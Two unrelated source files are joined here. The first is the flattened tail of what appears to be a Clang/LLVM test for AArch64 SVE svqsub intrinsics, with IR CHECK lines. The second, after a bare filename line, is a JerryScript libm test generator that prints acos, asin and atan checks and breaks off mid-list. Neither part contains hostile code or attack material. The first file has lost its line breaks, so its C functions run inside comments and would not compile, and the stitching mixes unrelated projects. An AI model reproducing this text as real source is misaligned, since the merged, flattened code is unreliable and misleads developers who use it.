CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svuint8_t test_svqsub_n_u8_m(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_m'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_mu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svuint16_t test_svqsub_n_u16_m(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_m'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_mu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: 
[[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svuint32_t test_svqsub_n_u32_m(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_m'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_mu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svuint64_t test_svqsub_n_u64_m(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_m'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_xu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> 
[[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svint8_t test_svqsub_n_s8_x(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_x'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_xu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svint16_t test_svqsub_n_s16_x(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_x'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_xu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svint32_t test_svqsub_n_s32_x(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 
{{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_x'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_xu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svint64_t test_svqsub_n_s64_x(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_x'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_xu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svuint8_t test_svqsub_n_u8_x(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_x'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // 
CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_xu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svuint16_t test_svqsub_n_u16_x(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_x'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_xu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svuint32_t test_svqsub_n_u32_x(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_x'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_x,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_x( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> 
@llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_xu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svuint64_t test_svqsub_n_u64_x(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_x'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_x'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_x,)(pg, op1, op2); }
866812.c
/* Copyright JS Foundation and other contributors, http://js.foundation
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/*
 * Unit test generator for jerry-libm.
 * To be compiled separately from the rest of jerry and to be linked to a trusted libm.
 * Its output should be redirected to test-libm.inc.h.
 *
 * Example:
 * gcc gen-test-libm.c -o gen-test-libm -lm
 * ./gen-test-libm >test-libm.inc.h
 */

#include <math.h>
#include <stdio.h>

#define GEN_INT_TEST(EXPR) printf("check_int (\"%s\", %s, %d);\n", #EXPR, #EXPR, EXPR);
#define GEN_DBL_TEST(EXPR) printf("check_double (\"%s\", %s, %.20E);\n", #EXPR, #EXPR, EXPR);

int main (int argc, char **args)
{
  printf ("/* Copyright JS Foundation and other contributors, http://js.foundation\n"
          " *\n"
          " * Licensed under the Apache License, Version 2.0 (the \"License\");\n"
          " * you may not use this file except in compliance with the License.\n"
          " * You may obtain a copy of the License at\n"
          " *\n"
          " * http://www.apache.org/licenses/LICENSE-2.0\n"
          " *\n"
          " * Unless required by applicable law or agreed to in writing, software\n"
          " * distributed under the License is distributed on an \"AS IS\" BASIS\n"
          " * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n"
          " * See the License for the specific language governing permissions and\n"
          " * limitations under the License.\n"
          " */\n"
          "\n"
          "/* This file is automatically generated by the gen-test-libm.sh script.\n"
          " * Do not edit! */\n"
          "\n");
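  /* Illustrative note (added; not part of the original generator): each
   * GEN_DBL_TEST expansion prints one self-checking line into
   * test-libm.inc.h, of the form
   *
   *   check_double ("acos (0.0)", acos (0.0), 1.57079632679489655800E+00);
   *
   * where the reference value is computed by the trusted libm and formatted
   * with %.20E. The check_int/check_double helpers are assumed to be defined
   * by the test file that includes the generated header. */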
  /* acos tests */
  GEN_DBL_TEST (acos (0.0));
  GEN_DBL_TEST (acos (-0.0));
  GEN_DBL_TEST (acos (1.0));
  GEN_DBL_TEST (acos (-1.0));
  GEN_DBL_TEST (acos (0.5));
  GEN_DBL_TEST (acos (-0.5));
  GEN_DBL_TEST (acos (INFINITY));
  GEN_DBL_TEST (acos (-INFINITY));
  GEN_DBL_TEST (acos (NAN));
  GEN_DBL_TEST (acos (6.9e-18));
  GEN_DBL_TEST (acos (-6.9e-18));
  GEN_DBL_TEST (acos (7.0e-18));
  GEN_DBL_TEST (acos (-7.0e-18));
  GEN_DBL_TEST (acos (7.4e-9));
  GEN_DBL_TEST (acos (-7.4e-9));
  GEN_DBL_TEST (acos (7.5e-9));
  GEN_DBL_TEST (acos (-7.5e-9));
  GEN_DBL_TEST (acos (0.1));
  GEN_DBL_TEST (acos (-0.1));
  GEN_DBL_TEST (acos (0.4));
  GEN_DBL_TEST (acos (-0.4));
  GEN_DBL_TEST (acos (0.6));
  GEN_DBL_TEST (acos (-0.6));
  GEN_DBL_TEST (acos (0.99));
  GEN_DBL_TEST (acos (-0.99));
  GEN_DBL_TEST (acos (1.1));
  GEN_DBL_TEST (acos (-1.1));
  GEN_DBL_TEST (acos (0.7));

  /* asin tests */
  GEN_DBL_TEST (asin (0.0));
  GEN_DBL_TEST (asin (-0.0));
  GEN_DBL_TEST (asin (1.0));
  GEN_DBL_TEST (asin (-1.0));
  GEN_DBL_TEST (asin (0.5));
  GEN_DBL_TEST (asin (-0.5));
  GEN_DBL_TEST (asin (0.98));
  GEN_DBL_TEST (asin (-0.98));
  GEN_DBL_TEST (asin (INFINITY));
  GEN_DBL_TEST (asin (-INFINITY));
  GEN_DBL_TEST (asin (NAN));
  GEN_DBL_TEST (asin (6.9e-18));
  GEN_DBL_TEST (asin (-6.9e-18));
  GEN_DBL_TEST (asin (7.0e-18));
  GEN_DBL_TEST (asin (-7.0e-18));
  GEN_DBL_TEST (asin (7.4e-9));
  GEN_DBL_TEST (asin (-7.4e-9));
  GEN_DBL_TEST (asin (7.5e-9));
  GEN_DBL_TEST (asin (-7.5e-9));
  GEN_DBL_TEST (asin (0.1));
  GEN_DBL_TEST (asin (-0.1));
  GEN_DBL_TEST (asin (0.4));
  GEN_DBL_TEST (asin (-0.4));
  GEN_DBL_TEST (asin (0.6));
  GEN_DBL_TEST (asin (-0.6));
  GEN_DBL_TEST (asin (0.97));
  GEN_DBL_TEST (asin (-0.97));
  GEN_DBL_TEST (asin (0.99));
  GEN_DBL_TEST (asin (-0.99));
  GEN_DBL_TEST (asin (1.1));
  GEN_DBL_TEST (asin (-1.1));
  GEN_DBL_TEST (asin (0.7));

  /* atan tests */
  GEN_DBL_TEST (atan (0.0));
  GEN_DBL_TEST (atan (-0.0));
  GEN_DBL_TEST (atan (7.0 / 16.0));
  GEN_DBL_TEST (atan (-7.0 / 16.0));
  GEN_DBL_TEST (atan (11.0 / 16.0));
  GEN_DBL_TEST (atan (-11.0 / 16.0));
  GEN_DBL_TEST (atan (19.0 / 16.0));
  GEN_DBL_TEST (atan (-19.0 / 16.0));
  GEN_DBL_TEST (atan (39.0 / 16.0));
  GEN_DBL_TEST (atan (-39.0 / 16.0));
  GEN_DBL_TEST (atan (1.0));
  GEN_DBL_TEST (atan (-1.0));
  GEN_DBL_TEST (atan (INFINITY));
  GEN_DBL_TEST (atan (-INFINITY));
  GEN_DBL_TEST (atan (NAN));
  GEN_DBL_TEST (atan (6.9 / 16.0));
  GEN_DBL_TEST (atan (-6.9 / 16.0));
  GEN_DBL_TEST (atan (7.1 / 16.0));
  GEN_DBL_TEST (atan (-7.1 / 16.0));
  GEN_DBL_TEST (atan (10.9 / 16.0));
  GEN_DBL_TEST (atan (-10.9 / 16.0));
  GEN_DBL_TEST (atan (11.1 / 16.0));
  GEN_DBL_TEST (atan (-11.1 / 16.0));
